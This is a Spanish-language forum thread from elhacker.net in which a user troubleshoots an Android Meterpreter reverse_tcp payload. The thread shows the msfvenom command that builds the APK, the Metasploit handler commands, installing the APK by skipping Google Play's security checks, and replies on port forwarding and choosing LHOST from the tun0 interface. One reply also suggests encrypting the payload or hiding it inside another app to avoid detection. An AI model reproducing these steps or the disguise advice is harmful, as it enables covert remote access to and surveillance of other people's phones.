elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  android/reverse_tcp metasploit (AYUDA!)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: android/reverse_tcp metasploit (AYUDA!)  (Leído 5,348 veces)
dkbost

Desconectado Desconectado

Mensajes: 1


Ver Perfil
android/reverse_tcp metasploit (AYUDA!)
« en: 18 Marzo 2022, 08:44 am »

Estoy aprendiendo a acceder remotamente a un dispositivo poniendo en practica mi propio dispositivo Android pero da un problema así que explicare como estoy haciendo:
(cabe destacar que estoy usando un punto de acceso a wifi remoto 'uno de mis moviles')

abro la terminal y pongo lo siguiente:

msfvenom -p android/meterpreter/reverse_tcp lhost=(ip_portmap) lport=(puerto_portmap) > /root/Escritorio/salida.apk
(tambien intente en lhost poner mi ip local y en lport 4545, a su vez intente tambien en lhost mi ip publica)

luego abro una terminal y uso openvpn (aqui la direccion de el archivo descargado desde portmap)

luego de que el apk se crea correctamente ejecuto metasploit v6.1.27-dev y uso los siguientes comandos:
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverce_tcp
set LHOST (mi ip local)
set LPORT 4545 (el puerto colocado en portmap)
exploit -j

y me sale el siguiente mensaje:

exploit running as background job 0.
exploit completed, but no sessions was created.
started reverse tcp handler on 10.0.2.15:5555

hasta ahí todo va bien pero que pasa luego de todo ese proceso instalo el apk en mi teléfono, me salto las verificaciones de seguridad de Google play, le doy a instalar de todas maneras y fino se instala, luego de ahí ejecuto el mainactivity desde mi teléfono y no pasa absolutamente nada, la terminal de kali se queda tal cual estaba, ejecuto el comando sessions y me sale que no hay ninguna sesión activa y la verdad es que no entiendo que es lo que estoy haciendo mal, si alguien me podría ayudar lo agradecería mucho.  :'(
En línea

Tirenex

Desconectado Desconectado

Mensajes: 49


Los virus siempre se inyectan en Antivirus


Ver Perfil
Re: android/reverse_tcp metasploit (AYUDA!)
« Respuesta #1 en: 23 Marzo 2022, 15:42 pm »

Ten en cuenta que éstas actividades están penadas con cárcel, pero deberías encontrar alguna manera de cifrar ése exploit con algún programa, o combinandolo con alguna app, supongo,pero
yo te recomendaría aprender cómo funciona ése exploit,la versión del exploit,pero al final, a base de intentos, seguro que lo lograrás,si no lo consigues de una manera, prueba con otra.
En línea

chinosor

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: android/reverse_tcp metasploit (AYUDA!)
« Respuesta #2 en: 17 Mayo 2022, 02:13 am »

Hola.
1. Asegúrate de tener el puerto 4545 abierto en tu Router.
2. El payload se genera con el host y port de portmap.
3. Al momento de configurar el exploit en la consola de metasploit, la ip y puerto que tienes que poner la puedes encontrar en tun0 al momento de ejecutar el comando de ifconfig:
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.253.132  netmask 255.255.255.0  broadcast 192.168.253.255
        inet6 fe80::20c:29ff:fe1b:57dd  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:1b:57:dd  txqueuelen 1000  (Ethernet)
        RX packets 157  bytes 37641 (36.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 52  bytes 7753 (7.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.9.246.94  netmask 255.255.255.255  destination 10.9.246.93
        inet6 fe80::f44a:ca6d:f9c6:4751  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 50

Tendras que usar los datos de tun0. En este caso quedaria
set LHOST 10.9.246.94
set LPORT (puerto que tienes abierto en el router, en tu caso 4545)
Si esta todo correcto debería funcionar todo bien.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda kali linux android/meterpreter/reverse_tcp
Análisis y Diseño de Malware
MrVndT 1 3,518 Último mensaje 20 Julio 2016, 16:21 pm
por MCKSys Argentina
Ataque a Android con Metasploit
Ingeniería Inversa
Iceberg 1 3,932 Último mensaje 18 Julio 2017, 17:37 pm
por apuromafo CLS
android/meterpreter/reverse_tcp error por favor ayuda
GNU/Linux
log015 0 2,488 Último mensaje 24 Agosto 2017, 02:08 am
por log015
error en payload android/meterpreter/reverse_tcp
Bugs y Exploits
log015 1 5,441 Último mensaje 11 Enero 2018, 01:38 am
por ronluas
MSFVENOM/ android/payload/reverse_tcp
Hacking
sinpianwlr 1 4,247 Último mensaje 29 Julio 2018, 13:22 pm
por CybeRoot
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines